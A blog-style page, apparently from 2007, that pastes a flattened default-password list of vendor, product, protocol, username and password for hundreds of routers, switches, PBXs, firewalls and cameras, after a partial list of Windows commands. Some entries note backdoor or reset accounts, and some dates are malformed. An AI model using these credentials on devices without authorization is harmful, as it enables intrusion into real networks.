letterSYSTEMINFO List system configurationTASKLIST List running applications and servicesTIME Display or set the system timeTIMEOUT Delay processing of a batch fileTITLE Set the window title for a CMD.EXE sessionTOUCH Change file timestamps TRACERT Trace route to a remote hostTREE Graphical display of folder structureTYPE Display the contents of a text fileUSRSTAT List domain usernames and last loginVER Display version informationVERIFY Verify that files have been savedVOL Display a disk labelWHERE Locate and display files in a directory treeWHOAMI Output the current UserName and domainWINDIFF Compare the contents of two files or sets of filesWINMSD Windows system diagnosticsWINMSDP Windows system diagnostics IIWMIC WMI CommandsXCACLS Change file permissionsXCOPY Copy files and foldersi recommend for all dos commands visithttp://www.ss64.com/nt/

win xp defolt password

2007-10-16T05:33:00.000-07:00

Default passwords

well i Hope u ll figure out How to use it
this is just what i picked up from d net for better indexing of the site on meta engines.explore d site u ll definitely encounter something new
Default Password ListManufactor Product Revision Protocol UID Password Access comment Validated Created LastMod3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet No 2002-1-10 2005-13-7 3COM CoreBuilder 7000/6000/3500/2500 Telnet tech tech No 2002-1-10 2005-13-7 3COM HiPerARC v4.1.x Telnet adm (none) No 2002-1-10 2005-13-7 3COM LANplex 2500 Telnet debug synnet No 2002-1-10 2005-13-7 3COM LANplex 2500 Telnet tech tech No 2002-1-10 2005-13-7 3COM LinkSwitch 2000/2700 Telnet tech tech No 2002-1-10 2005-13-7 3COM NetBuilder SNMP ANYCOM snmp-read No 2002-1-10 2005-13-7 3COM NetBuilder SNMP ILMI snmp-read No 2002-1-10 2005-13-7 3COM Netbuilder Multi admin (none) Admin No 2002-1-10 2005-13-7 3COM Office Connect ISDN Routers 5x0 Telnet n/a PASSWORD Admin No 2002-1-10 2005-13-7 3COM SuperStack II Switch 2200 Telnet debug synnet No 2002-1-10 2005-13-7 3COM SuperStack II Switch 2700 Telnet tech tech No 2002-1-10 2005-13-7 3COM OfficeConnect 812 ADSL Multi adminttd adminttd Admin No 2002-1-10 2005-13-7 3COM Wireless AP ANY Multi admin comcomcom Admin Works on all 3com wireless APs No 2002-1-10 2005-13-7 3COM CellPlex 7000 Telnet tech tech User No 2002-1-10 2005-13-7 3COM cellplex 7000 Telnet admin admin Admin No 2002-1-10 2005-13-7 3COM HiPerARC v4.1.x Telnet adm (none) Admin No 2002-1-10 2005-13-7 3COM LANplex 2500 Telnet tech (none) Admin No 2002-1-10 2005-13-7 3COM CellPlex HTTP admin synnet Admin No 2002-1-10 2005-13-7 3COM SuperStack II Switch 2700 Telnet tech tech Admin No 2002-1-10 2005-13-7 3COM CellPlex 7000 Telnet root (none) Admin No 2002-1-10 2005-13-7 3COM HiPerACT v4.1.x Telnet admin (none) Admin No 2002-1-10 2005-13-7 3COM CellPlex 7000 Telnet tech (none) Admin No 2002-1-10 2005-13-7 3COM CellPlex 7000 Telnet admin admin Admin No 2002-1-10 2005-13-7 3COM SuperStack 3 4XXX Multi admin (none) Admin No 2003-1-8 2005-13-7 3COM SuperStack 3 4XXX Multi monitor monitor User No 2003-1-8 2005-13-7 3COM SuperStack 3 4400-49XX Multi manager manager User can access/change operational setting but not security settings Yes 2003-1-8 2005-13-7 3COM Netbuilder HTTP Root (none) Admin http://10.1.0.1 Yes 2004-24-2 2005-13-7 3COM 3C16450 Multi admin (none) Admin telnet or serial Yes 2004-24-2 2005-13-7 3COM 3C16406 Multi admin (none) Admin telnet or serial Yes 2004-24-2 2005-13-7 3COM Office Connect ISDN Routers 5x0 Telnet? n/a PASSWORD Admin No 2003-1-1 2005-13-7 3COM CoreBuilder 7000/6000/3500/2500 Telnet n/a admin Admin 2006-02-02 2006-02-02 3COM CoreBuilder 7000/6000/3500/2500 Telnet n/a (none) Admin 2006-02-09 2006-02-09 3COM OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100-72 HTTP (none) admin Admin http://192.168.1.1 2006-03-25 2006-03-25 3Com Internet Firewall 3C16770 HTTP admin password Admin No 2004-12-7 2005-13-7 3Com Shark Fin Comcast-supplied HTTP User Password Diagnostics page 192.160.100.1 2006-06-14 2006-06-14 3M VOL-0215 etc. SNMP volition volition Admin for Volition fibre switches No 2002-19-10 2005-13-7 3c om 812 HTTP Administrator admin Admin 2006-01-28 2006-01-28 3com cellplex 7000 Telnet operator (none) Admin No 2002-1-10 2005-13-7 3com 3Com SuperStack 3 Switch 3300XM Multi security security Admin No 2002-1-10 2005-13-7 3com superstack II 1100/3300 Console 3comcso RIP000 initialize resets all pws to defaults No 2003-29-1 2005-13-7 3com NetBuilder SNMP (none) admin User SNMP_READ No 2002-1-10 2005-13-7 3com CellPlex 7000 Telnet tech tech Admin No 2002-1-10 2005-13-7 3com super Telnet admin (none) Admin No 2003-21-2 2005-13-7 3com cellplex 7000 Multi admin admin Admin RS-232/telnet Yes 2002-1-10 2005-13-7 3com CellPlex 7000 Telnet root (none) Admin No 2002-1-10 2005-13-7 3com Netbuilder Multi admin (none) Admin No 2002-1-10 2005-13-7 3com cellplex 7000 Telnet operator (none) Admin No 2002-1-10 2005-13-7 3com OfficeConnect 812 ADSL 01.50-01 Multi admin (none) Admin No 2002-1-10 2005-13-7 3com cellplex Multi admin admin Admin No 2002-1-10 2005-13-7 3com HiPerACT v4.1.x Telnet admin (none) Admin No 2002-1-10 2005-13-7 3com 3c16405 Multi n/a (none) Admin No 2002-1-10 2005-13-7 3com 3c16405 Console Administrator (none) Admin No 2002-1-10 2005-13-7 3com Switch 3300XM Multi admin admin Admin No 2002-1-10 2005-13-7 3com SS III Switch 4xxx (4900 - sure) Telnet recovery recovery resets_all_to_default u need to power off unit. tbl_ No 2003-19-7 2005-13-7 3com OfficeConnect Wireless 11g Cable/DSL Gateway HTTP (none) admin Admin No 2003-1-9 2005-13-7 3com 3C16405 Multi admin (none) Admin Yes 2002-1-10 2005-13-7 3com OfficeConnect 812 ADSL 01.50-01 Multi admin (none) Admin No 2002-1-10 2005-13-7 3com cellplex Multi n/a (none) Admin No 2002-1-10 2005-13-7 3com cellplex Multi admin admin Admin No 2002-1-10 2005-13-7 3com HiPerACT v4.1.x Telnet admin (none) Admin No 2002-1-10 2005-13-7 3com 3c16405 Console Administrator (none) Admin No 2002-1-10 2005-13-7 3com CellPlex 7000 Telnet tech (none) Admin No 2002-1-10 2005-13-7 3com Switch 3300XM Multi admin admin Admin No 2002-1-10 2005-13-7 3com SS III Switch 4xxx (4900 - sure) Telnet recovery recovery resets_all_to_default u need to power off unit. tbl_ No 2003-19-7 2005-13-7 3com OfficeConnect Wireless 11g Cable/DSL Gateway HTTP (none) admin Admin No 2003-1-9 2005-13-7 3com 3CRADSL72 1.2 Multi (none) 1234admin Admin snmp open by default with public / private community No 2004-23-3 2005-13-7 3com CB9000 / 4007 3 Console Type User: FORCE (none) Admin This will recover a lost password and reset the switch config to Factory Default No 2004-24-3 2005-13-7 3com officeconnect Multi n/a (none) Admin No 2004-3-6 2005-13-7 3com superstack II Netbuilder 11.1 Multi n/a (none) Admin No 2004-21-8 2005-13-7 3com officeconnect Multi admin (none) Admin 2006-02-16 2006-02-16 3com office connect 11g Multi admin (none) User 2006-02-16 2006-02-16 3com LANplex 2500 Telnet n/a admin Admin 2006-09-20 2006-09-20 3ware 3DM HTTP Administrator 3ware Admin 2006-05-26 2006-05-26 ACCTON Wirelessrouter T-online HTTP none 0 Admin YEAHH No 2004-28-1 2005-13-7 ADC Kentrox Pacesetter Router Telnet n/a secret No 2002-1-10 2005-13-7 ADIC Scalar 100/1000 HTTP admin secure Admin No 2004-11-5 2005-13-7 ADIC Scalar i2000 Multi admin password Admin No 2005-13-3 2005-13-7 ALCATEL 4400 Console mtcl (none) User 2006-05-29 2006-05-29 ALLNET T-DSL Modem Software Version: v1.51 HTTP admin admin Admin No 2003-16-1 2005-13-7 AMBIT ADSL Telnet root (none) Admin No 2002-1-10 2005-13-7 AOC zenworks 4.0 Multi n/a admin Admin No 2004-22-5 2005-13-7 APC 9606 Smart Slot Telnet n/a backdoor Admin No 2004-9-2 2005-13-7 APC USV Network Management Card SNMP n/a TENmanUFactOryPOWER Admin nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase No 2004-23-1 2005-13-7 APC UPSes (Web/SNMP Mgmt Card) HTTP device device Admin Secondary access account (next to apc/apc) No 2004-19-7 2005-13-7 APC Smart UPS Multi apc apc Admin No 2005-9-2 2005-13-7 ARtem ComPoint - CPD-XT-b CPD-XT-b Telnet (none) admin Admin No 2005-10-1 2005-13-7 ASMAX AR701u / ASMAX AR6024 HTTP admin epicrouter Admin 2006-03-18 2006-03-18 ASMAX AR800C2 HTTP admin epicrouter Admin 2006-03-18 2006-03-18 ASMAX AR800C2 HTTP admin epicrouter Admin 2006-03-18 2006-03-18 ASUS WL-500G 1.7.5.6 HTTP admin admin Admin 2005-10-24 2005-10-24 AVAYA g3R v6 Console root ROOT500 Admin No 2002-1-10 2005-13-7 AVAYA Cajun P33x firmware before 3.11.0 SNMP n/a admin Admin check the Bugtraq archives for more information No 2002-1-10 2005-13-7 AXUS AXUS YOTTA Multi n/a 00000000 Admin Storage DAS SATA to SCSI/FC 2006-03-07 2006-03-07 Accelerated Networks DSL CPE and DSLAM Telnet sysadm anicust No 2002-1-10 2005-13-7 Aceex Modem ADSL Router HTTP admin (none) Admin No 2004-15-2 2005-13-7 Aceex Modem ADSL Router HTTP admin (none) Admin No 2004-15-2 2005-13-7 Actiontec Wireless Broadband Router Multi admin password Admin Verizon Fios Setup 2006-10-13 2006-10-13 Advantek Networks Wireless LAN 802.11 g/b Multi admin (none) Admin http://www.advanteknetworks.com/ 2006-00-07 2006-00-07 Aethra Starbridge EU HTTP admin password Admin 2006-00-23 2006-00-23 AirTies RT-210 AirTies RT-210 AirTies RT-210 Telnet admin admin Admin AirTies RT-210 2006-08-06 2006-08-06 Alcatel PBX 4400 Port 2533 kermit kermit unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel PBX 4400 Port 2533 dhs3mt dhs3mt unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel PBX 4400 Port 2533 at4400 at4400 unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel PBX 4400 Port 2533 mtch mtch unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel PBX 4400 Port 2533 mtcl mtcl unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel PBX 4400 Port 2533 root letacla unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel PBX 4400 Port 2533 dhs3pms dhs3pms unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel PBX 4400 Port 2533 adfexc adfexc unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel PBX 4400 Port 2533 client client unknown Yes 2002-1-10 2006-05-28 Alcatel PBX 4400 Port 2533 install llatsni unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel PBX 4400 Port 2533 halt tlah unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7 Alcatel Office 4200 Multi n/a 1064 Admin by Bazille No 2002-1-10 2005-13-7 Alcatel OmniStack 6024 Telnet admin switch Admin Yes 2002-1-10 2005-13-7 Alcatel Omnistack/Omniswitch Telnet/Console diag switch Admin Yes 2003-22-7 2005-13-7 Alcatel Omnistack/omniswitch Telnet diag switch Admin No 2004-27-5 2005-13-7 Alcatel Timestep VPN 1520 3.00.026 Permit config and console root permit Admin Perm/Config port 38036 No 2004-16-7 2005-13-7 Alcatel OXO 1.3 Multi (none) admin User No 2005-28-3 2005-13-7 Alcatel OmniPCX Office 4.1 FTP ftp_inst pbxk1064 Installer 2006-04-23 2006-04-23 Alcatel OmniPCX Office 4.1 FTP ftp_admi kilo1987 Admin 2006-04-23 2006-04-23 Alcatel OmniPCX Office 4.1 FTP ftp_oper help1954 Operator 2006-04-23 2006-04-23 Alcatel OmniPCX Office 4.1 FTP ftp_nmc tuxalize NMC 2006-04-23 2006-04-23 Allied Telesyn Multi manager friend Admin No 2002-1-10 2005-13-7 Allied Telesyn AT-8024(GB) Console n/a admin Admin No 2002-1-10 2005-13-7 Allied Telesyn AT-8024(GB) HTTP manager admin Admin No 2002-1-10 2005-13-7 Allied Telesyn AT Router HTTP root (none) Admin No 2004-21-11 2005-13-7 Allied Telesyn ALAT8326GB Multi manager manager Admin 2005-09-02 2005-09-02 Allied Telesyn AT8016F Console manager friend Admin 2005-09-26 2005-09-26 Allied Telesyn AT-AR130 (U) -10 HTTP Manager friend Admin Default IP is 192.168.242.242 2006-05-09 2006-05-09 Allnet ALL0275 802.11g AP 1.0.6 HTTP none admin Admin No 2003-26-9 2005-13-7 Alteon ACEDirector3 console admin (none) No 2002-1-10 2005-13-7 Alteon ACEswitch 180e HTTP admin admin Admin No 2002-1-10 2005-13-7 Alteon ACEswitch 180e Telnet admin (none) No 2002-1-10 2005-13-7 Alteon ACEswitch 180e HTTP admin linga Admin none No 2002-1-10 2005-13-7 Alteon AD4 9 Console admin admin Admin Factory default No 2004-20-4 2005-13-7 Ambit Cable Modem 60678eu 1.12 Multi root root Admin No 2004-5-1 2005-13-7 Ambit Cable Modem Multi root root Admin Time Warner Cable issued modem No 2004-27-1 2005-13-7 Ambit ntl:home 200 2.67.1011 HTTP root root Admin This is the cable modem supplied by NTL in the UK No 2004-6-7 2005-13-7 Amitech wireless router and access point 802.11g 802.11b any HTTP admin admin Admin Web interface is on 192.168.1.254 available on the LAN ports of the AP. No 2005-6-2 2005-13-7 Andover Controls Infinity any Console acc acc Admin Building managment system No 2003-2-11 2005-13-7 Apple AirPort Base Station (Graphite) 2 Multi (none) public public See Apple article number 58613 for details No 2003-25-8 2005-13-7 Apple Airport Base Station (Dual Ethernet) 2 Multi n/a password Guest See Apple article number 106597 for details No 2003-25-8 2005-13-7 Apple Airport Extreme Base Station 2 Multi n/a admin Guest see Apple article number 107518 for details No 2003-25-8 2005-13-7 Areca RAID controllers Console admin 0000 Admin 2005-08-28 2005-08-28 Arescom modem/router 10XX Telnet n/a atc123 Admin No 2004-18-9 2005-13-7 Asante IntraSwitch multi IntraSwitch Asante Admin No 2002-1-10 2005-13-7 Asante IntraStack multi IntraStack Asante Admin No 2002-1-10 2005-13-7 Asante FM2008 Telnet superuser (none) Admin No 2004-16-11 2005-13-7 Asante FM2008 Multi admin asante Admin 2006-02-01 2006-02-01 Ascend Yurie Multi readonly lucenttech2 No 2002-1-10 2005-13-7 Ascend Router Telnet n/a ascend Admin No 2002-1-10 2005-13-7 Ascend Sahara Multi root ascend No 2002-1-10 2005-13-7 Ascom Ascotel PBX ALL Multi (none) 3ascotel Admin no user req. _by DTK No 2003-13-5 2005-13-7 Asmax Ar-804u HTTP admin epicrouter Admin 2006-04-11 2006-04-11 Aspect ACD 6 HTTP customer none User views error logs No 2002-1-10 2005-13-7 Aspect ACD 6 Oracle DTA TJM User No 2002-1-10 2005-13-7 Aspect ACD 7 Oracle DTA TJM User No 2002-1-10 2005-13-7 Aspect ACD 8 Oracle DTA TJM User No 2002-1-10 2005-13-7 Asus wl503g All HTTP admin admin Admin 2005-07-17 2005-07-17 Asus wl500 All HTTP admin admin Admin 2005-07-17 2005-07-17 Asus wl300 All HTTP admin admin Admin 2005-07-17 2005-07-17 Asus WL500g Deluxe HTTP admin admin Admin 2006-02-18 2006-02-18 Asus P5P800 Multi n/a admin User 2006-03-09 2006-03-09 Atlantis A02-RA141 Multi admin atlantis Admin 2006-06-19 2006-06-19 Atlantis I-Storm Lan Router ADSL Multi admin atlantis Admin (submit by fedematico) 2006-06-21 2006-06-21 Avaya Definity G3Si Multi craft (none) Admin No 2002-1-10 2005-13-7 Avaya Cajun Pxxx Multi root root Admin No 2002-1-10 2005-13-7 Avaya Cajun P550R P580 P880 and P882 Multi diag danger Developer No 2002-16-9 2005-13-7 Avaya Cajun P550R P580 P880 and P882 Multi manuf xxyyzz Developer No 2002-16-9 2005-13-7 Avaya Pxxx 5.2.14 Multi diag danger Admin No 2002-16-9 2005-13-7 Avaya Pxxx 5.2.14 Multi manuf xxyyzz Admin No 2002-16-9 2005-13-7 Avaya definity up to rev. 6 any craft crftpw Admin No 2003-23-3 2005-13-7 Avaya CMS Supervisor 11 Console root cms500 Admin No 2004-1-1 2005-13-7 Avaya Definity Multi dadmin dadmin01 Admin 2005-08-29 2005-08-29 Axis NETCAM 200/240 Telnet root pass Admin Yes 2002-1-10 2005-13-7 Axis All Axis Printserver All Multi root pass Admin No 2004-17-5 2005-13-7 Axis Webcams HTTP root pass Admin No 2004-21-11 2005-13-7 Axis 540/542 Print Server Multi root pass Admin No 2005-12-1 2005-13-7 Axis NETCAM 200/240 root pass No 2003-1-1 2005-13-7 BBR-4MG and BBR-4HG BUFFALO ALL HTTP root n/a Admin 2005-10-12 2005-10-12 BMC Patrol 6 Multi patrol patrol User No 2002-1-10 2005-13-7 BMC Software Patrol all BMC unique Administrator the same all over Admin this default user normally for ALL system in this area with one Password Yes 2003-6-1 2005-13-7 Bausch Datacom Proxima PRI ADSL PSTN Router4 Wireless Multi admin epicrouter Admin 2006-01-09 2006-01-09 Bay Networks Switch 350T Telnet n/a NetICs Admin No 2002-1-10 2005-13-7 Bay Networks SuperStack II Telnet security security Admin No 2002-1-10 2005-13-7 Bay Networks Router Telnet User (none) User No 2002-1-10 2005-13-7 Bay Networks Router Telnet Manager (none) Admin No 2002-1-10 2005-13-7 Bay Networks Router User (none) User No 2003-1-1 2005-13-7 Bay Networks SuperStack II security security Admin No 2003-1-1 2005-13-7 Bay Networks Switch 350T n/a NetICs Admin No 2003-1-1 2005-13-7 Belkin F5D6130 SNMP (none) MiniAP Admin Wireless Acess Point IEEE802.11b No 2003-26-3 2005-13-7 Belkin F5D7150 FB Multi n/a admin Admin No 2005-11-2 2005-13-7 Benq awl 700 wireless router 1.3.6 Beta-002 Multi admin admin Admin 2005-06-20 2005-06-20 Billion Bipac 5100 HTTP admin admin Admin No 2004-30-4 2005-13-7 Billion BIPAC-640 AC 640AE100 HTTP (none) (none) Admin 2005-11-14 2005-11-14 BinTec Bianca/Brick XM-5.1 SNMP n/a snmp-Trap read/write by rootkid No 2003-23-3 2005-13-7 BinTec x1200 37834 Multi admin bintec Admin No 2003-1-8 2005-13-7 BinTec x2300i 37834 Multi admin bintec Admin No 2003-1-8 2005-13-7 BinTec x3200 37834 Multi admin bintec Admin No 2003-1-8 2005-13-7 Bintec Bianka Routers Multi admin bintec Admin No 2002-1-10 2005-13-7 Blue Coat Systems ProxySG 3.x HTTP admin articon Admin access to command line interface via ssh and web gui 2005-11-14 2005-11-14 Bluecoat ProxySG (all model) SGOS 3 / SGOS4 HTTPS (8082) admin admin Admin 2006-09-10 2006-09-10 Breezecom Breezecom Adapters 3.x n/a Master Admin No 2002-1-10 2005-13-7 Breezecom Breezecom Adapters 2.x n/a laflaf Admin No 2002-1-10 2005-13-7 Breezecom Breezecom Adapters 4.4.x Console n/a Helpdesk Admin No 2004-30-4 2005-13-7 Breezecom Breezecom Adapters 4.x n/a Super No 2003-1-1 2005-13-7 Breezecom Breezecom Adapters 3.x n/a Master No 2003-1-1 2005-13-7 Breezecom Breezecom Adapters 2.x n/a laflaf No 2003-1-1 2005-13-7 Broadlogic XLT router HTTP webadmin webadmin Admin 2006-02-01 2006-02-01 Broadlogic XLT router Telnet admin admin Admin 2006-02-01 2006-02-01 Broadlogic XLT router Telnet installer installer Admin 2006-02-01 2006-02-01 Brocade Fabric OS All Multi root fivranne Admin Gigiabit SAN (by Nicolas Gregoire) No 2003-4-8 2005-13-7 Brocade Silkworm all Multi admin password Admin Also on other Fiberchannel switches No 2003-25-7 2005-13-7 Brocade Fabric OS Multi admin password Admin Gigabit SAN No 2003-4-8 2005-13-7 Brother NC-3100h (none) access network board access No 2002-1-10 2005-13-7 Brother NC-4100h (none) access network board access No 2002-1-10 2005-13-7 Brother HL-1270n Multi n/a access network board access No 2002-1-10 2005-13-7 Brother NC-2100p Multi (none) access Admin NC-2100p Print Server 2006-08-16 2006-08-16 Buffalo Wireless Broadband Base Station-g WLA-G54 WBR-G54 HTTP root (none) Admin http://192.168.11.1 Yes 2004-13-1 2005-13-7 CISCO Cache Engine Console admin diamond Admin No 2002-1-10 2005-13-7 CNET CNET 4PORT ADSL MODEM CNAD NF400 Multi admin epicrouter Admin 2006-02-02 2006-02-02 CNET CSH-2400W unk HTTP admin 1234 Admin 2006-08-05 2006-08-05 COM3 OLe HTTP admin admin User No 2002-1-10 2005-13-7 CTC Union ATU-R130 81001a Multi root root Admin 2006-06-13 2006-06-13 Cable And Wireless ADSL Modem/Router Multi admin 1234 Admin 2006-03-30 2006-03-30 Cabletron Netgear modem/router and SSR netman (none) Admin No 2002-1-10 2005-13-7 Cayman Cayman DSL n/a (none) Admin No 2003-1-1 2005-13-7 Celerity Mediator Multi Multi mediator mediator User No 2002-26-11 2005-13-7 Celerity Mediator Multi root Mau'dib Admin Assumption: the password is Mua'dib No 2002-26-11 2005-13-7 Cellit CCPro Multi cellit cellit Admin No 2003-10-6 2005-13-7 Checkpoint SecurePlatform NG FP3 Console admin admin Admin No 2002-14-10 2005-13-7 CipherTrust IronMail Any Multi admin password Admin No 2005-18-4 2005-13-7 Cisco ConfigMaker cmaker cmaker Admin No 2002-1-10 2005-13-7 Cisco CNR All CNR GUI admin changeme Admin This is the default password for Cisco Network Registrar No 2002-1-10 2005-13-7 Cisco Netranger/secure IDS Multi netrangr attack No 2002-1-10 2005-13-7 Cisco BBSM 5.0 and 5.1 Telnet or Named Pipes bbsd-client changeme2 database The BBSD Windows Client password will match the BBSD MSDE Client password No 2002-1-10 2005-13-7 Cisco BBSD MSDE Client 5.0 and 5.1 Telnet or Named Pipes bbsd-client NULL database The BBSD Windows Client password will match the BBSD MSDE Client password No 2002-1-10 2005-13-7 Cisco BBSM Administrator 5.0 and 5.1 Multi Administrator changeme Admin No 2002-1-10 2005-13-7 Cisco Netranger/secure IDS 3.0(5)S17 Multi root attack Admin must be changed at the first connection No 2002-1-10 2005-13-7 Cisco BBSM MSDE Administrator 5.0 and 5.1 IP and Named Pipes sa (none) Admin No 2002-1-10 2005-13-7 Cisco Catalyst 4000/5000/6000 All SNMP (none) public/private/secret RO/RW/RW+change SNMP config default on All Cat switches running the native CatOS CLI software. No 2003-14-2 2005-13-7 Cisco PIX firewall Telnet (none) cisco User No 2002-1-10 2005-13-7 Cisco VPN Concentrator 3000 series 3 Multi admin admin Admin No 2003-29-4 2005-13-7 Cisco Content Engine Telnet admin default Admin No 2003-6-6 2005-13-7 Cisco AP1200 IOS Multi Cisco Cisco Admin This is when you convert AP1200 or AP350 to IOS No 2003-15-11 2005-13-7 Cisco CiscoWorks 2000 guest (none) User No 2003-1-1 2005-13-7 Cisco CiscoWorks 2000 admin cisco Admin No 2003-1-1 2005-13-7 Cisco ConfigMaker cmaker cmaker Admin No 2003-1-1 2005-13-7 Cisco Ciso Aironet 1100 series Rev. 01 HTTP (none) Cisco Admin 2005-07-02 2005-07-02 Cisco Aironet Multi (none) _Cisco Admin 2006-02-01 2006-02-01 Cisco Aironet Multi Cisco Cisco Admin 2006-02-01 2006-02-01 Cisco HSE Multi root blender Admin 2006-02-01 2006-02-01 Cisco HSE Multi hsa hsadb Admin 2006-02-01 2006-02-01 Cisco WLSE Multi root blender Admin 2006-02-01 2006-02-01 Cisco WLSE Multi wlse wlsedb Admin 2006-02-01 2006-02-01 Cisco Aironet 1200 HTTP root Cisco Admin 2006-02-22 2006-02-22 Cisco CallManager HTTP admin admin Admin nabil ouchn 2006-08-14 2006-08-14 Cisco WSLE all all wlseuser wlsepassword User see also enable passwd 2006-08-14 2006-08-14 Cisco WLSE all Console enable (none) enable use with wlseuser 2006-08-14 2006-08-14 Cisco Cisco Wireless Location Appliance 2700 Series prior to 2.1.34.0 Multi root password Admin Added by DPL admin. From http://www.securitytracker.com/alerts/2006/Oct/1017056 Yes 2006-09-15 2006-10-15 Cisco MeetingPlace Console technician 2 + last 4 of Audio Server chasis Serial case-sensitive + 561384 Admin Used for Audio Server or MeetingTime software 2006-09-21 2006-09-21 Cisco-Arrowpoint Arrowpoint admin system Admin No 2002-1-10 2005-13-7 Compaq Insight Manager administrator administrator Admin No 2002-1-10 2005-13-7 Compaq Insight Manager anonymous (none) User No 2002-1-10 2005-13-7 Compaq Insight Manager user user User No 2002-1-10 2005-13-7 Compaq Insight Manager operator operator No 2002-1-10 2005-13-7 Compaq Insight Manager user public User No 2002-1-10 2005-13-7 Compaq Insight Manager PFCUser 240653C9467E45 User No 2002-1-10 2005-13-7 Conexant Router HTTP n/a epicrouter Admin 2006-00-07 2006-00-07 Conexant Router HTTP n/a admin Admin yes 2006-01-21 2006-01-21 Corecess Corecess 3112 HTTP Administrator admin Admin No 2004-5-5 2005-13-7 Corecess 6808 APC Telnet corecess corecess User 2006-00-18 2006-00-18 Cyclades PR 1000 Telnet super surt Admin mpacheco.inimigo.com No 2005-01-31 2005-13-7 Cyclades TS800 HTTP root tslinux Admin mpacheco.inimigo.com No 2005-01-31 2005-13-7 D-LINK DSL-G664T A1 HTTP admin admin Admin SSID : G664T_WIRELESS No 2004-9-7 2005-13-7 D-Link hubs/switches Telnet D-Link D-Link No 2002-1-10 2005-13-7 D-Link DI-704 rev a Multi (none) admin Admin Cable/DSL Routers/Switches Yes 2002-1-10 2005-13-7 D-Link DI-804 v2.03 Multi admin (none) Admin Contributed by _CR_ No 2002-1-10 2005-13-7 D-Link DWL 900AP Multi (none) public Admin Yes 2003-1-4 2005-13-7 D-Link DI-614+ HTTP user (none) User by rootkid No 2003-21-3 2005-13-7 D-Link DWL-614+ rev a rev b HTTP admin (none) Admin http://192.168.0.1 Yes 2002-12-10 2005-13-7 D-Link D-704P rev b Multi admin (none) Admin Yes 2003-15-1 2005-13-7 D-Link DI-604 rev a rev b rev c rev e Multi admin (none) Admin http://192.168.0.1 Yes 2003-18-6 2005-13-7 D-Link DWL-614+ 2.03 HTTP admin (none) Admin No 2002-12-10 2005-13-7 D-Link D-704P Multi admin admin Admin No 2003-15-1 2005-13-7 D-Link DWL-900+ HTTP admin (none) Admin No 2003-14-2 2005-13-7 D-Link DI-704 Multi n/a admin Admin No 2003-26-7 2005-13-7 D-Link DI-604 1.62b+ HTTP admin (none) Admin No 2003-30-7 2005-13-7 D-Link DI-624 all HTTP admin (none) Admin No 2003-25-8 2005-13-7 D-Link DI-624 all HTTP User (none) Admin No 2003-25-8 2005-13-7 D-Link DI-604 2.02 HTTP admin admin Admin No 2003-30-10 2005-13-7 D-Link DWL 1000 HTTP admin (none) Admin No 2004-25-2 2005-13-7 D-Link DI-514 Multi user (none) Admin No 2004-1-4 2005-13-7 D-Link DI-614+ any HTTP admin (none) Admin all access :D No 2004-15-4 2005-13-7 D-Link DWL 2100AP Multi admin (none) Admin No 2004-7-7 2005-13-7 D-Link DSL-302G Multi admin admin Admin No 2004-14-10 2005-13-7 D-Link DI-624+ A3 HTTP admin admin Admin No 2004-5-11 2005-13-7 D-Link DWL-2000AP+ 1.13 HTTP admin (none) Admin Wireless Access Point No 2004-24-11 2005-13-7 D-Link DI-614+ HTTP admin admin Admin No 2005-28-2 2005-13-7 D-Link Dsl-300g+ Teo Telnet (none) private Admin 2005-11-12 2005-11-12 D-Link DSL-300g+ Teo HTTP admin admin Admin 2005-11-12 2005-11-12 D-Link DI-524 all HTTP admin (none) Admin http://192.168.0.1 2005-11-21 2005-11-21 D-Link firewall dfl-200 HTTP admin admin Admin 2006-02-04 2006-02-04 D-Link DI-524 all HTTP user (none) User 2006-05-20 2006-05-20 D-Link DI-634M Multi admin (none) Admin 2006-10-13 2006-10-13 D-link DWL-900AP+ rev a rev b rev c HTTP admin (none) Admin http://192.168.0.50 No 2003-14-2 2005-13-7 D-link DSL500G Multi admin admin Admin 2006-03-07 2006-03-07 D-link DSL-504T HTTP admin admin Admin 2006-03-18 2006-03-18 D-link DSL-G604T Multi admin admin Admin 2006-03-18 2006-03-18 D-link Di-707p router HTTP admin (none) Admin 2006-02-25 2006-02-25 DI624 D-LINK C3 HTTP admin password Admin hardcoded for Verizon FiOS 2006-04-03 2006-04-03 DLINK 604 Multi n/a admin Admin No 2006-07-17 2006-08-23 Dallas Semiconductors TINI embedded JAVA Module <= 1.0 Telnet root tini Admin No 2002-1-10 2005-13-7 Datacom BSASX/101 n/a letmein Admin No 2002-1-10 2005-13-7 Datawizard.net FTPXQ server FTP anonymous any@ read/write on c:\ No 2002-1-10 2005-13-7 Davox Unison Multi root davox Admin No 2003-10-6 2005-13-7 Davox Unison Multi admin admin User No 2003-10-6 2005-13-7 Davox Unison Multi davox davox User No 2003-10-6 2005-13-7 Davox Unison Sybase sa (none) Admin No 2003-10-6 2005-13-7 Deerfield MDaemon HTTP MDaemon MServer Admin web interface to manage MDaemon. fixed June 2002 No 2003-22-6 2005-13-7 Dell Laser Printer 3000cn / 3100cn HTTP admin password Admin 2005-09-26 2005-09-26 Dell Remote Access Card HTTP root calvin Admin 2006-03-11 2006-03-11 Demarc Network Monitor multi admin my_DEMARC Admin No 2002-1-10 2005-13-7 Deutsch Telekomm T-Sinus 130 DSL HTTP (none) 0000 Admin No 2005-06-14 2005-07-16 Deutsche Telekom T-Sinus DSL 130 HTTP admin (none) Admin Usuallay also a WirelessLan AP :) No 2003-1-1 2005-13-7 Deutsche Telekom T-Sinus 154 DSL 13.9.38 HTTP (none) 0000 Admin thx to AwdCzAb 2006-04-10 2006-04-10 Deutsche Telekom T-Sinus 1054 DSL All HTTP (none) 0000 Admin 2006-10-20 2006-10-20 Develcon Orbitor Default Console n/a BRIDGE Admin No 2002-1-10 2005-13-7 Develcon Orbitor Default Console n/a password Admin No 